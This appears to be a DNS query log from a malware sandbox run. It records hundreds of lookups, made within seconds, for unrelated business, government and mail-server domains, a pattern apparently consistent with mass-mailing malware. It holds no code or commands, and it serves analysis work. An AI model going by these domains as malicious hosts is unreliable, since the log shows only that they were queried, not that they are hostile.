                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.701948881 CEST192.168.2.68.8.8.80x8f2cStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.702308893 CEST192.168.2.68.8.8.80xd59eStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.702954054 CEST192.168.2.68.8.8.80x5aefStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.703469038 CEST192.168.2.68.8.8.80xcf02Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.801356077 CEST192.168.2.68.8.8.80x9985Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.803184032 CEST192.168.2.68.8.8.80xbe3bStandard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.869045019 CEST192.168.2.68.8.8.80x8e53Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:04.899957895 CEST192.168.2.68.8.8.80xf73dStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.001151085 CEST192.168.2.68.8.8.80x5447Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.005858898 CEST192.168.2.68.8.8.80x9892Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.025111914 CEST192.168.2.68.8.8.80x4534Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.052879095 CEST192.168.2.68.8.8.80x8b31Standard query (0)in1.smtp.messaginguser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.232477903 CEST192.168.2.68.8.8.80xd395Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.239578962 CEST192.168.2.68.8.8.80xa006Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.240854025 CEST192.168.2.68.8.8.80xe753Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.303239107 CEST192.168.2.68.8.8.80x34dbStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.337033987 CEST192.168.2.68.8.8.80x2c12Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.337548018 CEST192.168.2.68.8.8.80xcb1eStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.338335037 CEST192.168.2.68.8.8.80xb70dStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.338745117 CEST192.168.2.68.8.8.80x59e9Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.339391947 CEST192.168.2.68.8.8.80xf8bcStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.339540005 CEST192.168.2.68.8.8.80x1d94Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.339840889 CEST192.168.2.68.8.8.80xe09bStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.341412067 CEST192.168.2.68.8.8.80x4b2Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.347187996 CEST192.168.2.68.8.8.80x76acStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.347253084 CEST192.168.2.68.8.8.80x1d30Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.358748913 CEST192.168.2.68.8.8.80x51a0Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.364413023 CEST192.168.2.68.8.8.80xdb5fStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.366065025 CEST192.168.2.68.8.8.80xf62bStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.433813095 CEST192.168.2.68.8.8.80xf711Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.437117100 CEST192.168.2.68.8.8.80x9494Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.443732977 CEST192.168.2.68.8.8.80xd4bcStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.447191954 CEST192.168.2.68.8.8.80xeaf9Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.449374914 CEST192.168.2.68.8.8.80x3d21Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.451634884 CEST192.168.2.68.8.8.80x49aeStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.452788115 CEST192.168.2.68.8.8.80x4709Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.453538895 CEST192.168.2.68.8.8.80x8ab6Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.505374908 CEST192.168.2.68.8.8.80xcedbStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.554297924 CEST192.168.2.68.8.8.80x3d7dStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.569045067 CEST192.168.2.68.8.8.80xc980Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.573600054 CEST192.168.2.68.8.8.80xedf1Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.619235039 CEST192.168.2.68.8.8.80x4534Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.622842073 CEST192.168.2.68.8.8.80xbd53Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.626612902 CEST192.168.2.68.8.8.80xa73Standard query (0)in1.smtp.messaginguser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.655740023 CEST192.168.2.68.8.8.80x72cbStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.661226034 CEST192.168.2.68.8.8.80x71bbStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.670696020 CEST192.168.2.68.8.8.80x1b07Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.678477049 CEST192.168.2.68.8.8.80xe8b2Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.730588913 CEST192.168.2.68.8.8.80x8441Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.734860897 CEST192.168.2.68.8.8.80xe00Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.735200882 CEST192.168.2.68.8.8.80xf180Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.735619068 CEST192.168.2.68.8.8.80x77c0Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.735678911 CEST192.168.2.68.8.8.80x3413Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.736263037 CEST192.168.2.68.8.8.80xdb98Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.736779928 CEST192.168.2.68.8.8.80x91beStandard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.750232935 CEST192.168.2.68.8.8.80x8207Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.750941992 CEST192.168.2.68.8.8.80xc761Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.794984102 CEST192.168.2.68.8.8.80xe239Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.795701981 CEST192.168.2.68.8.8.80x9e2aStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.816570044 CEST192.168.2.68.8.8.80xad48Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.858319998 CEST192.168.2.68.8.8.80x98eaStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.865442038 CEST192.168.2.68.8.8.80x389fStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.886888027 CEST192.168.2.68.8.8.80x77beStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.949520111 CEST192.168.2.68.8.8.80x1edfStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.950977087 CEST192.168.2.68.8.8.80xfd31Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.958229065 CEST192.168.2.68.8.8.80x32cbStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:05.962666988 CEST192.168.2.68.8.8.80xac6dStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.005949020 CEST192.168.2.68.8.8.80x9fe1Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.015479088 CEST192.168.2.68.8.8.80x9eb0Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.016598940 CEST192.168.2.68.8.8.80x5c29Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.022190094 CEST192.168.2.68.8.8.80x6638Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.024058104 CEST192.168.2.68.8.8.80xa53aStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.051798105 CEST192.168.2.68.8.8.80x2797Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.052544117 CEST192.168.2.68.8.8.80xd1fcStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.060386896 CEST192.168.2.68.8.8.80x9892Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.120210886 CEST192.168.2.68.8.8.80xbc51Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.242430925 CEST192.168.2.68.8.8.80x8fe3Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.256661892 CEST192.168.2.68.8.8.80x2107Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.266392946 CEST192.168.2.68.8.8.80xe9a6Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.270364046 CEST192.168.2.68.8.8.80x4c83Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.274674892 CEST192.168.2.68.8.8.80xaaeeStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.283521891 CEST192.168.2.68.8.8.80x9eecStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.316337109 CEST192.168.2.68.8.8.80x4508Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.333182096 CEST192.168.2.68.8.8.80xad5dStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.345141888 CEST192.168.2.68.8.8.80xcfb7Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.350007057 CEST192.168.2.68.8.8.80x76acStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.355540037 CEST192.168.2.68.8.8.80x7207Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.367089987 CEST192.168.2.68.8.8.80x9cb9Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.414146900 CEST192.168.2.68.8.8.80x3f7fStandard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.418176889 CEST192.168.2.68.8.8.80x6118Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.455828905 CEST192.168.2.68.8.8.80x5c15Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.499625921 CEST192.168.2.68.8.8.80x6f20Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.499627113 CEST192.168.2.68.8.8.80xddbbStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.499708891 CEST192.168.2.68.8.8.80xbb7fStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.499815941 CEST192.168.2.68.8.8.80x6369Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.502403021 CEST192.168.2.68.8.8.80x126fStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.504204988 CEST192.168.2.68.8.8.80x2629Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.505176067 CEST192.168.2.68.8.8.80x34eeStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.536042929 CEST192.168.2.68.8.8.80xc3eaStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.556562901 CEST192.168.2.68.8.8.80x59f6Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.592037916 CEST192.168.2.68.8.8.80x3f6aStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.610279083 CEST192.168.2.68.8.8.80x78Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.611468077 CEST192.168.2.68.8.8.80x4534Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.621942043 CEST192.168.2.68.8.8.80x4deeStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.648112059 CEST192.168.2.68.8.8.80xbc17Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.654436111 CEST192.168.2.68.8.8.80x20d7Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.657592058 CEST192.168.2.68.8.8.80x809cStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.667570114 CEST192.168.2.68.8.8.80x54b5Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.693141937 CEST192.168.2.68.8.8.80x5852Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.715655088 CEST192.168.2.68.8.8.80x1b07Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.718897104 CEST192.168.2.68.8.8.80x90ceStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.720756054 CEST192.168.2.68.8.8.80x455dStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.722815037 CEST192.168.2.68.8.8.80xfa30Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.755075932 CEST192.168.2.68.8.8.80x96e0Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.759726048 CEST192.168.2.68.8.8.80x8465Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.775139093 CEST192.168.2.68.8.8.80xdfb8Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.775695086 CEST192.168.2.68.8.8.80x4c5eStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.781276941 CEST192.168.2.68.8.8.80xcc0dStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.781351089 CEST192.168.2.68.8.8.80x4745Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.781579971 CEST192.168.2.68.8.8.80x81f8Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.782339096 CEST192.168.2.68.8.8.80x9fa7Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.810486078 CEST192.168.2.68.8.8.80xba56Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.816386938 CEST192.168.2.68.8.8.80x9fdeStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.873776913 CEST192.168.2.68.8.8.80x54d3Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.922780037 CEST192.168.2.68.8.8.80x38ffStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.928507090 CEST192.168.2.68.8.8.80x5adeStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.932883978 CEST192.168.2.68.8.8.80x98eaStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.934926033 CEST192.168.2.68.8.8.80x9841Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.947843075 CEST192.168.2.68.8.8.80xdadStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.970890999 CEST192.168.2.68.8.8.80x1fcfStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.972887993 CEST192.168.2.68.8.8.80xcbfdStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:06.998548031 CEST192.168.2.68.8.8.80x64a2Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.005470991 CEST192.168.2.68.8.8.80x8baStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.005625963 CEST192.168.2.68.8.8.80xc8d3Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.006050110 CEST192.168.2.68.8.8.80xbb82Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.050815105 CEST192.168.2.68.8.8.80x1c61Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.054450989 CEST192.168.2.68.8.8.80x91bcStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.063478947 CEST192.168.2.68.8.8.80x1e2cStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.067275047 CEST192.168.2.68.8.8.80x1e58Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.067424059 CEST192.168.2.68.8.8.80x6feStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.072614908 CEST192.168.2.68.8.8.80x91a6Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.091927052 CEST192.168.2.68.8.8.80xfc9aStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.093312025 CEST192.168.2.68.8.8.80xb6efStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.093882084 CEST192.168.2.68.8.8.80xdb39Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.094047070 CEST192.168.2.68.8.8.80xc901Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.101136923 CEST192.168.2.68.8.8.80xd8a1Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.117990971 CEST192.168.2.68.8.8.80x2a4aStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.144359112 CEST192.168.2.68.8.8.80x3cc5Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.160286903 CEST192.168.2.68.8.8.80x88a3Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.167454004 CEST192.168.2.68.8.8.80x1f29Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.185302973 CEST192.168.2.68.8.8.80x94f2Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.187171936 CEST192.168.2.68.8.8.80xb3cStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.199887037 CEST192.168.2.68.8.8.80x2364Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.204574108 CEST192.168.2.68.8.8.80xdf7fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.257263899 CEST192.168.2.68.8.8.80xc79eStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.280402899 CEST192.168.2.68.8.8.80xe233Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.282531977 CEST192.168.2.68.8.8.80x1f00Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.288569927 CEST192.168.2.68.8.8.80x4c83Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.303402901 CEST192.168.2.68.8.8.80x2cf1Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.307188988 CEST192.168.2.68.8.8.80x94d7Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.325328112 CEST192.168.2.68.8.8.80x5a5cStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.326666117 CEST192.168.2.68.8.8.80xedf6Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.332391977 CEST192.168.2.68.8.8.80x9496Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.400432110 CEST192.168.2.68.8.8.80x76acStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.407821894 CEST192.168.2.68.8.8.80xcd3bStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.424997091 CEST192.168.2.68.8.8.80x15edStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.445761919 CEST192.168.2.68.8.8.80x5dfdStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.505609989 CEST192.168.2.68.8.8.80xf248Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.509371996 CEST192.168.2.68.8.8.80x6f20Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.511600018 CEST192.168.2.68.8.8.80x9e25Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.518023014 CEST192.168.2.68.8.8.80x241cStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.565429926 CEST192.168.2.68.8.8.80x40e5Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.621786118 CEST192.168.2.68.8.8.80xa082Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
